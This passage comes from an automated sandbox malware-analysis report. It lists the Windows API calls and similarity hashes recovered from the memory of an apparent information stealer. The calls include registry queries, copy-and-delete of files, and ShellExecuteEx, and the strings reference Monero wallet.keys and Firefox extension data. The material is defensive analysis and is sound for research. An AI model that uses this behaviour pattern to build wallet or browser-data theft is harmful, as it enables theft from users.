                      • RegOpenKeyExA.ADVAPI32(80000002,0101B8B0,00000000,00020119,?), ref: 00557E5E
                      • RegQueryValueExA.ADVAPI32(?,0102E648,00000000,00000000,000000FF,000000FF), ref: 00557E7F
                      • RegCloseKey.ADVAPI32(?), ref: 00557E92
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: ea9875ee0aac64b87c809c110d8b61b7b89ac13a2c635eeb5e030f3313882078
                      • Instruction ID: 56efb76b2cf95b8240b611862324fabffb5c27db4d9d664421e8e5140a368cad
                      • Opcode Fuzzy Hash: ea9875ee0aac64b87c809c110d8b61b7b89ac13a2c635eeb5e030f3313882078
                      • Instruction Fuzzy Hash: 481130B1A44209BBE710CF94DD5AF6BBBBCFB08711F20815AFA05A7280D77858048BA1
                      APIs
                      • StrStrA.SHLWAPI(0102F140,?,?,?,0055140C,?,0102F140,00000000), ref: 0055926C
                      • lstrcpyn.KERNEL32(0078AB88,0102F140,0102F140,?,0055140C,?,0102F140), ref: 00559290
                      • lstrlen.KERNEL32(?,?,0055140C,?,0102F140), ref: 005592A7
                      • wsprintfA.USER32 ref: 005592C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpynlstrlenwsprintf
                      • String ID: %s%s
                      • API String ID: 1206339513-3252725368
                      • Opcode ID: 9f7940edcf45aaec21ec8089b50fafa8c05c5bccacee08966612f887eaaea519
                      • Instruction ID: 500163c78d6353240f4ecee5eca953ff5661c5dbbb00720c7d4a87e4dac5f2b1
                      • Opcode Fuzzy Hash: 9f7940edcf45aaec21ec8089b50fafa8c05c5bccacee08966612f887eaaea519
                      • Instruction Fuzzy Hash: D0011EB5540208FFDB04DFECC994EAE7BB9FB44351F108559F9098B204C639EA40DB95
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005412B4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 005412BB
                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005412D7
                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005412F5
                      • RegCloseKey.ADVAPI32(?), ref: 005412FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: 0ec7eea1b13991060d52ec5011131c44e89d319206e36b727f7f310a1b5b2fe7
                      • Instruction ID: 64496cd3bf276e75d5650731245ab0fb3b43d498094a3344207a8784ed2141fb
                      • Opcode Fuzzy Hash: 0ec7eea1b13991060d52ec5011131c44e89d319206e36b727f7f310a1b5b2fe7
                      • Instruction Fuzzy Hash: 4D0136B9A40208BBEB00DFE0DC49FAEB7B8EB48701F108155FA05D7280D6749A019F55
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00556663
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00556726
                      • ExitProcess.KERNEL32 ref: 00556755
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                      • String ID: <
                      • API String ID: 1148417306-4251816714
                      • Opcode ID: bd9e8f6393f17b99cd10519670dff27aa2f3dec5de4685aae1da7e9307b98591
                      • Instruction ID: 76d0334e3cb9ae8ef9df826022545192d81595670c63ba0d09d7774564a70188
                      • Opcode Fuzzy Hash: bd9e8f6393f17b99cd10519670dff27aa2f3dec5de4685aae1da7e9307b98591
                      • Instruction Fuzzy Hash: 82312FB1801219ABDB14EB50DCA5FDD7B78BF84301F40418AF61976191DF746B48CF6A
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00560E28,00000000,?), ref: 0055882F
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00558836
                      • wsprintfA.USER32 ref: 00558850
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                      • String ID: %dx%d
                      • API String ID: 1695172769-2206825331
                      • Opcode ID: 0e252984dd6d77bbbfbb8d926a5186856423be9433bbf97c6958831450a9ffc9
                      • Instruction ID: f27ffd1b6372606241725577f9286628833b3f6ade8cf7fff71a170a96260dd7
                      • Opcode Fuzzy Hash: 0e252984dd6d77bbbfbb8d926a5186856423be9433bbf97c6958831450a9ffc9
                      • Instruction Fuzzy Hash: 632103B1A40204BFEB04DFD4DD49FAEBBB8FB48711F20851AF605A7290D77D99018BA5
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0055951E,00000000), ref: 00558D5B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00558D62
                      • wsprintfW.USER32 ref: 00558D78
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesswsprintf
                      • String ID: %hs
                      • API String ID: 769748085-2783943728
                      • Opcode ID: b6e4b7bf5d711e34fed9c634af68a8ee0d2c3c33e38d54bcf60a15649016f6b9
                      • Instruction ID: 8931413a5d93e79e9bf228168f7fb1994a05517786c729212b24a77a023167f5
                      • Opcode Fuzzy Hash: b6e4b7bf5d711e34fed9c634af68a8ee0d2c3c33e38d54bcf60a15649016f6b9
                      • Instruction Fuzzy Hash: FCE0E675A80208BBD710DB94DD09E5977B8EB44711F104155FE0997280D9755E109B66
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0102EBC0,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054A2E1
                      • lstrlen.KERNEL32(00000000,00000000), ref: 0054A3FF
                      • lstrlen.KERNEL32(00000000), ref: 0054A6BC
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                      • DeleteFileA.KERNEL32(00000000), ref: 0054A743
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 07435dfd65fa43a7814629fed067686beb75d2da823935a033708263daffa14a
                      • Instruction ID: f727ed7e75c65934af3fc6f130f2f1465cfa966cd4508246718fd0363928680b
                      • Opcode Fuzzy Hash: 07435dfd65fa43a7814629fed067686beb75d2da823935a033708263daffa14a
                      • Instruction Fuzzy Hash: 6EE105728101199BDB04FBA4DCA9EEE7738BF94301F50825AF91772091EF346A4DCB66
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0102EBC0,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054D481
                      • lstrlen.KERNEL32(00000000), ref: 0054D698
                      • lstrlen.KERNEL32(00000000), ref: 0054D6AC
                      • DeleteFileA.KERNEL32(00000000), ref: 0054D72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 957931c790ea410a7d711780f2bc308e58600e9c62b2aa6be65d172bbf1004b5
                      • Instruction ID: bb55c24b0563f19868464467eb3b8617c289e58c8a48576a330db8ca67d68301
                      • Opcode Fuzzy Hash: 957931c790ea410a7d711780f2bc308e58600e9c62b2aa6be65d172bbf1004b5
                      • Instruction Fuzzy Hash: 7E91F3729101199BDB04FBA4DC6ADEE7B38BF94301F50825AF90766091EF346A0DCB66
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0102EBC0,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054D801
                      • lstrlen.KERNEL32(00000000), ref: 0054D99F
                      • lstrlen.KERNEL32(00000000), ref: 0054D9B3
                      • DeleteFileA.KERNEL32(00000000), ref: 0054DA32
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 03e63f4d7e801832d3c140ecec666106b776b1bb6d6a5190718c2cc0b63150b5
                      • Instruction ID: 90d356ce6535db78ddb3e5459bf64d55bb91af62d0eb9e9704fdaf298da1c2e4
                      • Opcode Fuzzy Hash: 03e63f4d7e801832d3c140ecec666106b776b1bb6d6a5190718c2cc0b63150b5
                      • Instruction Fuzzy Hash: 0581E3729101199BDB04FBA4DC6ADEE7B38BF94301F50461AF907A6091FF346A0DCB66
                      APIs
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                        • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                        • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                        • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                        • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                        • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                        • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00561580,00560D92), ref: 0054F54C
                      • lstrlen.KERNEL32(00000000), ref: 0054F56B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                      • String ID: ^userContextId=4294967295$moz-extension+++
                      • API String ID: 998311485-3310892237
                      • Opcode ID: 49bcffd257cb1d07fd3b0ba9c2ffd09254bc4779b0dd1089ce3093091b06ebb2
                      • Instruction ID: 69d75cf741c8010d092ac5da7bc7713bcca57574e9c3c40cf811166c58df3f1e
                      • Opcode Fuzzy Hash: 49bcffd257cb1d07fd3b0ba9c2ffd09254bc4779b0dd1089ce3093091b06ebb2
                      • Instruction Fuzzy Hash: AD51F371D10109AADB04FBA4DC6ADED7B78BF94301F408629FC1667195EE346A0DCBA2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen
                      • String ID:
                      • API String ID: 367037083-0
                      • Opcode ID: df943eacd92a1b0bc10ef7effec0c5f33747618258ac46ea734b89e146173fb5
                      • Instruction ID: a401023cc5657121996fc52df2ea977b3834e5aed451e30fab1370fde49d0c1f
                      • Opcode Fuzzy Hash: df943eacd92a1b0bc10ef7effec0c5f33747618258ac46ea734b89e146173fb5
                      • Instruction Fuzzy Hash: D7416271D10109EBCB04EFE4C865AEEBB74BF54305F10851AE81677290EB74A609CFA2
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                        • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                        • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
